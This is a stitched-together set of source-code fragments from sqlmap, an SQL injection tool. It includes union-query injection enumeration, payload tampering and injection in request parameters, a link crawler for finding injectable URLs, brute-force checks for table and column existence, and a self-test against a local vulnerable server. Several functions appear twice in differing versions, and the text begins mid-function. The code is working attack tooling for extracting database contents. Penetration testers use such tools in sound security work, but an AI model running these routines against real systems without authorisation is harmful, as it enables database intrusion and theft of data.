for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif (not count or int(count) == 0): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) else: value = [] # for empty tables return value threadData = getCurrentThreadData() threadData.shared.limits = iter(xrange(startLimit, stopLimit)) numThreads = min(conf.threads, (stopLimit - startLimit)) threadData.shared.value = BigArray() threadData.shared.buffered = [] threadData.shared.lastFlushed = startLimit - 1 if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True debugMsg = "suppressing possible resume console info because of " debugMsg += "large number of rows. It might take too long" logger.debug(debugMsg) try: def unionThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: try: num = threadData.shared.limits.next() except StopIteration: break if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): field = expressionFieldsList[0] elif Backend.isDbms(DBMS.ORACLE): field = expressionFieldsList else: field = None limitedExpr = agent.limitQuery(num, expression, field) output = _oneShotUnionUse(limitedExpr, unpack, True) if not kb.threadContinue: break if output: if all(map(lambda _: _ in output, (kb.chars.start, kb.chars.stop))): items = parseUnionPage(output) with kb.locks.value: # in case that we requested N columns and we get M!=N then we have to filter a bit if isListLike(items) and len(items) > 1 and len(expressionFieldsList) > 1: items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] index = None for index in xrange(len(threadData.shared.buffered)): if threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, items)) while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]: threadData.shared.lastFlushed += 1 _ = threadData.shared.buffered[0][1] if not isNoneValue(_): threadData.shared.value.extend(arrayizeValue(_)) del threadData.shared.buffered[0] else: with kb.locks.value: index = None for index in xrange(len(threadData.shared.buffered)): if threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, None)) items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo): status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(",".join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))))) if len(status) > width: status = "%s..." % status[:width - 3] dataToStdout("%s\r\n" % status, True) runThreads(numThreads, unionThread) if conf.verbose == 1: clearConsoleLine(True) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) finally: for _ in sorted(threadData.shared.buffered): if not isNoneValue(_[1]): threadData.shared.value.extend(arrayizeValue(_[1])) value = threadData.shared.value kb.suppressResumeInfo = False if not value and not abortedFlag: output = _oneShotUnionUse(expression, unpack) value = parseUnionPage(output) duration = calculateDeltaSeconds(start) if not kb.bruteMode: debugMsg = "performed %d queries in %d seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], duration) logger.debug(debugMsg) return value
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target url page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None page = None pageLength = None uri = None if not place: place = kb.injection.place or PLACE.GET raise404 = place != PLACE.URI if raise404 is None else raise404 payload = agent.extractPayload(value) threadData = getCurrentThreadData() if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload) value = agent.replacePayload(value, payload) logger.log(9, payload) if place == PLACE.COOKIE and conf.cookieUrlencode: value = agent.removePayloadDelimiters(value) value = urlEncodeCookieValues(value) elif place: if place in (PLACE.GET, PLACE.POST, PLACE.URI): # payloads in GET and/or POST need to be urlencoded # throughly without safe chars (especially & and =) # addendum: as we support url encoding in tampering # functions therefore we need to use % as a safe char if place != PLACE.URI or ('?' in value and value.find('?') < value.find(payload)): payload = urlencode(payload, "%", False, True) value = agent.replacePayload(value, payload) elif place == PLACE.SOAP: # payloads in SOAP should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', '>').replace('<', '<') value = agent.replacePayload(value, payload) value = agent.removePayloadDelimiters(value) if conf.checkPayload: checkPayload(value) if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value if PLACE.SOAP in conf.parameters: post = conf.parameters[PLACE.SOAP] if place != PLACE.SOAP or not value else value if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.UA in conf.parameters: ua = conf.parameters[PLACE.UA] if place != PLACE.UA or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) return retVal for randomParameter in conf.rParam: for item in [PLACE.GET, PLACE.POST, PLACE.COOKIE]: if item in conf.parameters: origValue = conf.parameters[item] if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter(cookie, randomParameter) get = urlencode(get, limit=True) if post and place != PLACE.POST and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) else: post = urlencode(post) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() warnMsg = "time-based comparison needs larger statistical " warnMsg += "model. Making a few dummy requests, please wait.." singleTimeWarnMessage(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = False warnMsg = "there is considerable lagging (standard deviation: " warnMsg += "%.1f sec%s) " % (deviation, "s" if deviation > 1 else "") warnMsg += "in connection response(s). Please use as high " warnMsg += "value for --time-sec option as possible (e.g. " warnMsg += "%d or more)" % (conf.timeSec * 2) logger.critical(warnMsg) elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter's " warnMsg += "bandwidth during usage of time-based queries" singleTimeWarnMessage(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) if headers: if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) if not pageLength: page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) threadData.lastQueryDuration = calculateDeltaSeconds(start) if kb.testMode: kb.testQueryCount += 1 if conf.cj: conf.cj.clear() if timeBasedCompare: return wasLastRequestDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) if content or response: return page, headers if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength) elif pageLength or page: return comparison(page, headers, code, getRatioValue, pageLength) else: return False
def unionUse(expression, unpack=True, dump=False): """ This function tests for an union SQL injection on the target url then call its subsidiary function to effectively perform an union SQL injection on the affected url """ initTechnique(PAYLOAD.TECHNIQUE.UNION) abortedFlag = False count = None origExpr = expression startLimit = 0 stopLimit = None value = None width = getConsoleWidth() start = time.time() _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) if expressionFieldsList and len(expressionFieldsList) > 1 and " ORDER BY " in expression.upper(): # No need for it in multicolumn dumps (one row is retrieved per request) and just slowing down on large table dumps expression = expression[:expression.upper().rindex(" ORDER BY ")] # We have to check if the SQL query might return multiple entries # and in such case forge the SQL limiting the query output one # entry per time # NOTE: I assume that only queries that get data from a table can # return multiple entries if (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ (dump and (conf.limitStart or conf.limitStop))) and \ " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \ and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ and not re.search(SQL_SCALAR_REGEX, expression, re.I): limitRegExp = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, expression, re.I) topLimit = re.search("TOP\s+([\d]+)\s+", expression, re.I) if limitRegExp or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query if limitGroupStart.isdigit(): startLimit = int(limitRegExp.group(int(limitGroupStart))) stopLimit = limitRegExp.group(int(limitGroupStop)) limitCond = int(stopLimit) > 1 elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): if limitRegExp: limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query if limitGroupStart.isdigit(): startLimit = int(limitRegExp.group(int(limitGroupStart))) stopLimit = limitRegExp.group(int(limitGroupStop)) limitCond = int(stopLimit) > 1 elif topLimit: startLimit = 0 stopLimit = int(topLimit.group(1)) limitCond = int(stopLimit) > 1 elif Backend.isDbms(DBMS.ORACLE): limitCond = False else: limitCond = True # I assume that only queries NOT containing a "LIMIT #, 1" # (or similar depending on the back-end DBMS) can return # multiple entries if limitCond: if limitRegExp: stopLimit = int(stopLimit) # From now on we need only the expression until the " LIMIT " # (or similar, depending on the back-end DBMS) word if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): stopLimit += startLimit untilLimitChar = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query) expression = expression[:untilLimitChar] elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): stopLimit += startLimit elif dump: if conf.limitStart: startLimit = conf.limitStart - 1 if conf.limitStop: stopLimit = conf.limitStop # Count the number of SQL query entries output countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] output = _oneShotUnionUse(countedExpression, unpack) count = parseUnionPage(output) if isNumPosStrValue(count): if isinstance(stopLimit, int) and stopLimit > 0: stopLimit = min(int(count), int(stopLimit)) else: stopLimit = int(count) infoMsg = "the SQL query used returns " infoMsg += "%d entries" % stopLimit logger.info(infoMsg) elif count and (not isinstance(count, basestring) or not count.isdigit()): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif not count or int(count) == 0: if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) else: value = [] # for empty tables return value threadData = getCurrentThreadData() threadData.shared.limits = iter(xrange(startLimit, stopLimit)) numThreads = min(conf.threads, (stopLimit - startLimit)) threadData.shared.value = BigArray() if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True debugMsg = "suppressing possible resume console info because of " debugMsg += "large number of rows. It might take too long" logger.debug(debugMsg) try: def unionThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limits: try: num = threadData.shared.limits.next() except StopIteration: break if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): field = expressionFieldsList[0] elif Backend.isDbms(DBMS.ORACLE): field = expressionFieldsList else: field = None limitedExpr = agent.limitQuery(num, expression, field) output = _oneShotUnionUse(limitedExpr, unpack, True) if not kb.threadContinue: break if output: if all(map(lambda x: x in output, [kb.chars.start, kb.chars.stop])): items = parseUnionPage(output) if isNoneValue(items): continue with kb.locks.value: for item in arrayizeValue(items): threadData.shared.value.append(item) else: items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo): status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(",".join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))))) if len(status) > width: status = "%s..." % status[:width - 3] dataToStdout("%s\r\n" % status, True) runThreads(numThreads, unionThread) if conf.verbose == 1: clearConsoleLine(True) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) finally: value = threadData.shared.value kb.suppressResumeInfo = False if not value and not abortedFlag: expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) # full union doesn't play well with ORDER BY value = _oneShotUnionUse(expression, unpack) duration = calculateDeltaSeconds(start) if not kb.bruteMode: debugMsg = "performed %d queries in %d seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], duration) logger.debug(debugMsg) return value
def crawl(target): try: visited = set() threadData = getCurrentThreadData() threadData.shared.value = OrderedSet() def crawlThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: if threadData.shared.unprocessed: current = threadData.shared.unprocessed.pop() if current in visited: continue elif conf.crawlExclude and re.search(conf.crawlExclude, current): dbgMsg = "skipping '%s'" % current logger.debug(dbgMsg) continue else: visited.add(current) else: break content = None try: if current: content = Request.getPage(url=current, crawling=True, raise404=False)[0] except SqlmapConnectionException as ex: errMsg = "connection exception detected ('%s'). skipping " % getSafeExString(ex) errMsg += "URL '%s'" % current logger.critical(errMsg) except SqlmapSyntaxException: errMsg = "invalid URL detected. skipping '%s'" % current logger.critical(errMsg) except _http_client.InvalidURL as ex: errMsg = "invalid URL detected ('%s'). skipping " % getSafeExString(ex) errMsg += "URL '%s'" % current logger.critical(errMsg) if not kb.threadContinue: break if isinstance(content, six.text_type): try: match = re.search(r"(?si)<html[^>]*>(.+)</html>", content) if match: content = "<html>%s</html>" % match.group(1) soup = BeautifulSoup(content) tags = soup('a') tags += re.finditer(r'(?i)<a[^>]+href=["\'](?P<href>[^>"\']+)', content) for tag in tags: href = tag.get("href") if hasattr(tag, "get") else tag.group("href") if href: if threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID: current = threadData.lastRedirectURL[1] url = _urllib.parse.urljoin(current, htmlUnescape(href)) # flag to know if we are dealing with the same target host _ = checkSameHost(url, target) if conf.scope: if not re.search(conf.scope, url, re.I): continue elif not _: continue if url.split('.')[-1].lower() not in CRAWL_EXCLUDE_EXTENSIONS: with kb.locks.value: threadData.shared.deeper.add(url) if re.search(r"(.*?)\?(.+)", url): threadData.shared.value.add(url) except UnicodeEncodeError: # for non-HTML files pass except ValueError: # for non-valid links pass finally: if conf.forms: findPageForms(content, current, False, True) if conf.verbose in (1, 2): threadData.shared.count += 1 status = '%d/%d links visited (%d%%)' % (threadData.shared.count, threadData.shared.length, round(100.0 * threadData.shared.count / threadData.shared.length)) dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) threadData.shared.deeper = set() threadData.shared.unprocessed = set([target]) if not conf.sitemapUrl: message = "do you want to check for the existence of " message += "site's sitemap(.xml) [y/N] " if readInput(message, default='N', boolean=True): found = True items = None url = _urllib.parse.urljoin(target, "/sitemap.xml") try: items = parseSitemap(url) except SqlmapConnectionException as ex: if "page not found" in getSafeExString(ex): found = False logger.warn("'sitemap.xml' not found") except: pass finally: if found: if items: for item in items: if re.search(r"(.*?)\?(.+)", item): threadData.shared.value.add(item) if conf.crawlDepth > 1: threadData.shared.unprocessed.update(items) logger.info("%s links found" % ("no" if not items else len(items))) infoMsg = "starting crawler" if conf.bulkFile: infoMsg += " for target URL '%s'" % target logger.info(infoMsg) for i in xrange(conf.crawlDepth): threadData.shared.count = 0 threadData.shared.length = len(threadData.shared.unprocessed) numThreads = min(conf.threads, len(threadData.shared.unprocessed)) if not conf.bulkFile: logger.info("searching for links with depth %d" % (i + 1)) runThreads(numThreads, crawlThread, threadChoice=(i > 0)) clearConsoleLine(True) if threadData.shared.deeper: threadData.shared.unprocessed = set(threadData.shared.deeper) else: break except KeyboardInterrupt: warnMsg = "user aborted during crawling. sqlmap " warnMsg += "will use partial list" logger.warn(warnMsg) finally: clearConsoleLine(True) if not threadData.shared.value: warnMsg = "no usable links found (with GET parameters)" logger.warn(warnMsg) else: for url in threadData.shared.value: kb.targets.add((urldecode(url, kb.pageEncoding), None, None, None, None)) storeResultsToFile(kb.targets)
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None): """ This method calls a function to get the target url page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None page = None pageLength = None uri = None raise404 = place != PLACE.URI if raise404 is None else raise404 if not place: place = kb.injection.place payload = agent.extractPayload(value) threadData = getCurrentThreadData() if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload) value = agent.replacePayload(value, payload) logger.log(9, payload) if place == PLACE.COOKIE and conf.cookieUrlencode: value = agent.removePayloadDelimiters(value) value = urlEncodeCookieValues(value) elif place: if place in (PLACE.GET, PLACE.POST): # payloads in GET and/or POST need to be urlencoded # throughly without safe chars (especially & and =) # addendum: as we support url encoding in tampering # functions therefore we need to use % as a safe char payload = urlencode(payload, "%", False, True) value = agent.replacePayload(value, payload) value = agent.removePayloadDelimiters(value) if conf.checkPayload: checkPayload(value) if PLACE.GET in conf.parameters: get = urlencode(conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value, limit=True) if PLACE.POST in conf.parameters: post = urlencode(conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value) if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.UA in conf.parameters: ua = conf.parameters[PLACE.UA] if place != PLACE.UA or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() warnMsg = "time-based comparison needs larger statistical " warnMsg += "model. Making a few dummy requests, please wait.." logger.warn(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" _, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) if not pageLength: page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) threadData.lastQueryDuration = calculateDeltaSeconds(start) if kb.testMode: kb.testQueryCount += 1 if conf.cj: conf.cj.clear() if timeBasedCompare: return wasLastRequestDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if content or response: return page, headers page = removeReflectiveValues(page, payload) if getRatioValue: return comparison(page, getRatioValue=False, pageLength=pageLength), comparison(page, getRatioValue=True, pageLength=pageLength) elif pageLength or page: return comparison(page, getRatioValue, pageLength) else: return False
def tableExists(tableFile, regex=None): result = inject.checkBooleanExpression( "%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr()))) if result: errMsg = "can't use table existence check because of detected invalid results " errMsg += "(most probably caused by inability of the used injection " errMsg += "to distinguish errornous results)" raise sqlmapDataException, errMsg tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS, ), unique=True) infoMsg = "checking table existence using items from '%s'" % tableFile logger.info(infoMsg) tables.extend(__addPageTextWords()) tables = filterListValue(tables, regex) threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(tables) threadData.shared.outputs = [] threadData.shared.unique = set() def tableExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: table = safeSQLIdentificatorNaming( tables[threadData.shared.count], True) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break if conf.db and METADB_SUFFIX not in conf.db: fullTableName = "%s%s%s" % ( conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table) else: fullTableName = table result = inject.checkBooleanExpression( "%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) kb.locks.io.acquire() if result and table.lower() not in threadData.shared.unique: threadData.shared.outputs.append(table) threadData.shared.unique.add(table.lower()) if conf.verbose in (1, 2): clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\r\n" % ( time.strftime("%X"), table) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%s)' % ( threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit), '%') dataToStdout( "\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, tableExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during table existence " warnMsg += "check. sqlmap will display partial output" logger.warn(warnMsg) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.outputs: warnMsg = "no table(s) found" logger.warn(warnMsg) else: for item in threadData.shared.outputs: if conf.db not in kb.data.cachedTables: kb.data.cachedTables[conf.db] = [item] else: kb.data.cachedTables[conf.db].append(item) for _ in map(lambda x: (conf.db, x), threadData.shared.outputs): if _ not in kb.brute.tables: kb.brute.tables.append(_) hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True) return kb.data.cachedTables
threadData.shared.deeper = set() threadData.shared.unprocessed = set([target]) logger.info("starting crawler") for i in xrange(conf.crawlDepth): if i > 0 and conf.threads == 1: singleTimeWarnMessage( "running in a single-thread mode. This could take a while." ) threadData.shared.count = 0 threadData.shared.length = len(threadData.shared.unprocessed) numThreads = min(conf.threads, len(threadData.shared.unprocessed)) logger.info("searching for links with depth %d" % (i + 1)) runThreads(numThreads, crawlThread) clearConsoleLine(True) if threadData.shared.deeper: threadData.shared.unprocessed = set(threadData.shared.deeper) else: break except KeyboardInterrupt: warnMsg = "user aborted during crawling. sqlmap " warnMsg += "will use partial list" logger.warn(warnMsg) finally: clearConsoleLine(True) if not threadData.shared.value: warnMsg = "no usable links found (with GET parameters)"
def vulnTest(): """ Runs the testing against 'vulnserver' """ retVal = True count, length = 0, 6 address, port = "127.0.0.10", random.randint(1025, 65535) def _thread(): vulnserver.init(quiet=True) vulnserver.run(address=address, port=port) thread = threading.Thread(target=_thread) thread.daemon = True thread.start() for options, checks in ( ("--flush-session", ("CloudFlare", )), ("--flush-session --parse-errors --eval=\"id2=2\" --referer=\"localhost\" --cookie=\"PHPSESSID=d41d8cd98f00b204e9800998ecf8427e\"", (": syntax error", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "back-end DBMS: SQLite", "3 columns")), ("--banner --schema --dump -T users --binary-fields=surname --where \"id>3\"", ("banner: '3", "INTEGER", "TEXT", "id", "name", "surname", "2 entries", "6E616D6569736E756C6C")), ("--all --tamper=between,randomcase", ("5 entries", "luther", "blisset", "fluffy", "179ad45c6ce2cb97cf1029e212046e81", "NULL", "nameisnull", "testpass")), ("-z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT 987654321\"", ( "length of query output", ": '987654321'", )), ("--technique=T --fresh-queries --sql-query=\"SELECT 1234\"", (": '1234'", )), ): cmd = "%s %s -u http://%s:%d/?id=1 --batch %s" % ( sys.executable, os.path.abspath( os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.py")), address, port, options) output = shellExec(cmd) if not all(check in output for check in checks): dataToStdout("---\n\n$ %s\n" % cmd) dataToStdout("%s---\n" % clearColors(output)) retVal = False count += 1 status = '%d/%d (%d%%) ' % (count, length, round( 100.0 * count / length)) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) clearConsoleLine() if retVal: logger.info("vuln test final result: PASSED") else: logger.error("vuln test final result: FAILED") return retVal
def columnExists(columnFile, regex=None): if not conf.tbl: errMsg = "missing table parameter" raise sqlmapMissingMandatoryOptionException, errMsg columns = getFileItems(columnFile, unique=True) columns = filterListValue(columns, regex) if conf.db and not conf.db.endswith(METADB_SUFFIX): table = "%s%s%s" % (conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', conf.tbl) else: table = conf.tbl table = safeSQLIdentificatorNaming(table) retVal = [] infoMsg = "checking column existence using items from '%s'" % columnFile logger.info(infoMsg) count = [0] length = len(columns) threads = [] collock = threading.Lock() iolock = threading.Lock() kb.threadContinue = True kb.bruteMode = True def columnExistsThread(): while count[0] < length and kb.threadContinue: collock.acquire() column = safeSQLIdentificatorNaming(columns[count[0]]) count[0] += 1 collock.release() result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s)", (column, table))) iolock.acquire() if result: retVal.append(column) if conf.verbose in (1, 2): clearConsoleLine(True) infoMsg = "\r[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), column) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%s)' % (count[0], length, round(100.0*count[0]/length), '%') dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) iolock.release() if conf.threads > 1: infoMsg = "starting %d threads" % conf.threads logger.info(infoMsg) else: message = "please enter number of threads? [Enter for %d (current)] " % conf.threads choice = readInput(message, default=str(conf.threads)) if choice and choice.isdigit(): conf.threads = int(choice) if conf.threads == 1: warnMsg = "running in a single-thread mode. This could take a while." logger.warn(warnMsg) # Start the threads for numThread in range(conf.threads): thread = threading.Thread(target=columnExistsThread, name=str(numThread)) thread.start() threads.append(thread) # And wait for them to all finish try: alive = True while alive: alive = False for thread in threads: if thread.isAlive(): alive = True thread.join(5) except KeyboardInterrupt: kb.threadContinue = False kb.threadException = True print logger.debug("waiting for threads to finish") warnMsg = "user aborted during common column existence check. " warnMsg += "sqlmap will display some columns only" logger.warn(warnMsg) try: while (threading.activeCount() > 1): pass except KeyboardInterrupt: raise sqlmapThreadException, "user aborted" finally: kb.bruteMode = False kb.threadContinue = True kb.threadException = False clearConsoleLine(True) dataToStdout("\n") if not retVal: warnMsg = "no column found" logger.warn(warnMsg) else: columns = {} for column in retVal: result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) if result: columns[column] = 'numeric' else: columns[column] = 'non-numeric' dataToSessionFile("[%s][%s][%s][COLUMN_EXISTS][%s|%s %s]\n" % (conf.url, kb.injection.place,\ safeFormatString(conf.parameters[kb.injection.place]), safeFormatString(table),\ safeFormatString(column), safeFormatString(columns[column]))) kb.data.cachedColumns[conf.db] = {conf.tbl: columns} return kb.data.cachedColumns
